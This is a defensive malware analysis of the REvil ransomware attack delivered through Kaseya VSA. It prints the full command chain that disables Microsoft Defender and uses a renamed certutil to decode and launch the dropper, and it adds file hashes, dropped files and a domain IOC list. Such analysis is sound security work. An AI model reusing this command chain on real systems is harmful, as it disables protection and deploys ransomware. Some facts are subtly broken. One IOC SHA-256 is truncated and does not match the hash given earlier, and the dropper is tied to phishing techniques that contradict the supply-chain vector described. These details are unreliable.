REvil Kaseya — sample analysis
On 2 July, Kaseya published an advisory stating it was under cyberattack with impacts to the VSA suite. This software enables patch management and monitoring of IT infrastructure and systems.
In the following days, the incident was identified as a supply-chain ransomware attack.
Compromise Initiation
The malicious payload was delivered to VSA servers and subsequently to VSA Agent applications running on managed Windows devices. This provided Revil and the specific operator the capability to initiate the attack. In this manner, the threat actors:
- initiated compromise through a trusted channel;
- exploited trust in VSA agent code, reflected in the anti-malware software exclusions required by Kaseya software.
All code executed by the Kaseya Agent Monitor is therefore bypassed due to these exclusions, which permitted the threat actors to distribute their dropper without detection.
To maximize damage and execute unimpeded, the threat actors leveraged Kaseya software to forcibly disable antivirus protection and initiated ransomware execution via the following command:
C:\WINDOWS\system32\cmd.exe” /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true – EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode – Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
ping 127.0.0.1 -n 4979> nul
Used as a timer, executing a random number (in this case 4979) of “echo null” iterations to localhost.
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Contains a PowerShell command to disable Microsoft Defender protection by disabling the following features:
- Real-time protection
- Network protection against exploitation of known vulnerabilities
- Scanning of all downloaded files and attachments
- Scanning of scripts
- Ransomware protection
- Protection that prevents any application from gaining access to dangerous domains that may host phishing scams, exploits, and other malicious content on the Internet
- Sharing of potential threat information with Microsoft Active Protection Service (MAPS)
- Automatic sample submission to Microsoft
copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe
Creates a copy of the certificate services utility and places it at C:\Windows\cert.exe.
Certutil.exe can be used to dump and display certificate authority (CA) configuration information, configure certificate services, backup and restore CA components, and verify certificates, key pairs, and certificate chains.
echo %RANDOM% >> C:\Windows\cert.exe
Appends a random number to the end of the cert.exe file in an attempt to evade security solutions that monitor the hash of cert.exe.
C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe
The CERTUTIL copy is used to decode the Base64-encoded payload from AGENT.CRT and writes it to the executable AGENT.EXE in Kaseya’s working directory.
del /q /f c:\kworking\agent.crt C:\Windows\cert.exe
The original payload file C:\KWORKING\AGENT.CRT and the CERTUTIL copy are deleted.
c:\kworking\agent.exe
Finally, the AGENTMON.EXE process executes AGENT.EXE. In this manner, the new process inherits system privileges from AGENTMON and ransomware deployment begins.
Static Analysis
Initial File
Tags
Dropper
Details
| original name | AGENT.EXE |
| md5 | 561CFFBABA71A6E8CC1CDCEDA990EAD4 |
| sha1 | 5162F14D75E96EDB914D1756349D6E11583DB0B0 |
| sha256 | D55F983C994CAA160EC63A59F6B4250FE67FB3E8C43A388AEC60A4A6978E9F1E |
| file-size | 912 264 (bytes) |
| entropy | 6.952 |
| imphash | 59349B1648EDDF021C01F05A17A0E870 |
| file-type | executable |
| cpu | 32-bit |
| Virustotal | score 44/68 |
Description
File signed by PB03 TRANSPORT LTD identified as the malware dropper for Revil/Sodinokibi. This dropper is designed to create two files in the hardcoded path “C:\Windows\“. The two payloads are embedded within the dropper itself through references to two resources. Detection and analysis of such dropper behaviour is critical to understanding the initial compromise vector; continuous monitoring of process execution and resource loading patterns enables early identification of T1566 (Phishing) and T1566.002 (Phishing: Spearphishing Attachment) delivery mechanisms.
First dropped file
Tag
Microsoft Windows Defender
Details
| original name | MsMpEng.exe |
| md5 | 8CC83221870DD07144E63DF594C391D9 |
| sha1 | 3D409B39B8502FCD23335A878F2CBDAF6D721995 |
| sha256 | 33BC14D231A4AFAA18F06513766D5F69D8B88F1E697CD127D24FB4B72AD44C7A |
| file-size | 22 224 (bytes) |
| entropy | 6.803 |
| description | Antimalware Service Executable |
| file-type | executable |
| cpu | 32-bit |
| Virustotal | score 0/68 |
Description
The file is identified as a legitimate copy of Microsoft Windows Defender (MsMpEng.exe).
After side-loading the malicious DLL, this Defender copy is exploited to execute the file encryption phase through a legitimate process, implementing T1036.005 (Masquerading: Match Legitimate Name or Location) and T1574.001 (Hijack Execution Flow: DLL Search Order Hijacking).
Second dropped file
Tag
Revil
Details
| original name | MpSvc.dll |
| md5 | A47CF00AEDF769D60D58BFE00C0B5421 |
| sha1 | 656C4D285EA518D90C1B669B79AF475DB31E30B1 |
| sha256 | 8DD620D9AEB35960BB766458C8890EDE987C33D239CF730F93FE49D90AE759DD |
| entropy | 6.979 |
| imphash | C699899ABB1119ED2B5C97D5D1D4542E |
| file-type | dynamic-link-library |
| cpu | 32-bit |
| file-size | 808 328 (bytes) |
| Virustotal | score 48/68 |
Details
Malicious DLL containing the payload of REvil and loaded into the legitimate Windows Defender executable to perform encryption operations.
The DLL exports three functions: ServiceCrtMain, ServiceMain, SvchostPushServiceGlobals.
Via ServiceCrtMain, retrieval and execution of malicious instructions occurs.
Indicators of Compromise (IOC)
| Indicator_type | Data | Note |
| file_path_name | C:\windows\cert.exe | Copied CERTUTIL |
| file_path_name | C:\windows\msmpeng.exe | Outdated Defender executable vulnerable to DLL sideload |
| sha256 | 33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a | Outdated Defender executable vulnerable to DLL sideload |
| file_path_name | C:\kworking\agent.crt | REvil dropper used in Kaseya exploit |
| sha256 | d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1 | REvil dropper used in Kaseya exploit |
| file_path_name | C:\windows\mpsvc.dll | REvil ransomware DLL |
| sha256 | 8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd | REvil ransomware DLL |
| domain | ncuccr.org | |
| domain | 1team.es | |
| domain | 4net.guru | |
| domain | 35-40konkatsu.net | |
| domain | 123vrachi.ru | |
| domain | 4youbeautysalon.com | |
| domain | 12starhd.online | |
| domain | 101gowrie.com | |
| domain | 8449nohate.org | |
| domain | 1kbk.com.ua | |
| domain | 365questions.org | |
| domain | 321play.com.hk | |
| domain | candyhouseusa.com | |
| domain | andersongilmour.co.uk | |
| domain | facettenreich27.de | |
| domain | blgr.be | |
| domain | fannmedias.com | |
| domain | southeasternacademyofprosthodontics.org | |
| domain | filmstreamingvfcomplet.be | |
| domain | smartypractice.com | |
| domain | tanzschule-kieber.de | |
| domain | iqbalscientific.com | |
| domain | pasvenska.se | |
| domain | cursosgratuitosnainternet.com | |
| domain | bierensgebakkramen.nl | |
| domain | c2e-poitiers.com | |
| domain | gonzalezfornes.es | |
| domain | tonelektro.nl | |
| domain | milestoneshows.com | |
| domain | blossombeyond50.com | |
| domain | thomasvicino.com | |
| domain | kaotikkustomz.com | |
| domain | mindpackstudios.com | |
| domain | faroairporttransfers.net | |
| domain | daklesa.de | |
| domain | bxdf.info | |
| domain | simoneblum.de | |
| domain | gmto.fr | |
| domain | cerebralforce.net | |
| domain | myhostcloud.com | |
| domain | fotoscondron.com | |
| domain | sw1m.ru | |
| domain | homng.net |
DLL sideloading remains a persistent technique for evading detection and achieving code execution within trusted system processes; organisations must maintain current patch levels and monitor for unsigned or mismatched DLL loading patterns.
